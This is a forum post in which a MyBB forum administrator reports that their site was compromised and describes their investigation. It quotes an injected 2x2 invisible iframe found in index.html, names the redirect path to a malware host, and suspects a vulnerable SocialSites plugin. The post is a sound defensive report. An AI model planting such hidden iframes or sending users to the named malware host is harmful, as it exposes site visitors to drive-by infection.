
Chrome returns a strange error:
Error 330 (net::ERR_CONTENT_DECODING_FAILED): Unknown error.
A wget -S returns an index.html that looks odd and starts with:
<iframe src="/cache/cache.php" width=2 height=2 frameborder="0"></iframe>
Getting that URL returns a 302 redirect to:
http://aa.celticchapel.com:88/page/clothes.php
which is the malware site.
I run MyBB on a VPS. No unknown IPs have ever logged into it, so the exploit happened through MyBB. MalwareBytes doesn't report anything on my PC either.
I've backed up the database and the MyBB directory, and will look next to see which templates were modified. I'll try now to get a clean 1.6.10 running. I have database backups done every 4 hours, so hopefully I'll be able to poinpoint the attack with some accuracy.
UPDATE: turns out I was using SocialSites 0.2.2, a vulnerable plugin. Hopefully this is what allowed the attack, but I can't rule it out for now. The vulnerable plugins thread should perhaps list the type of vulnerability?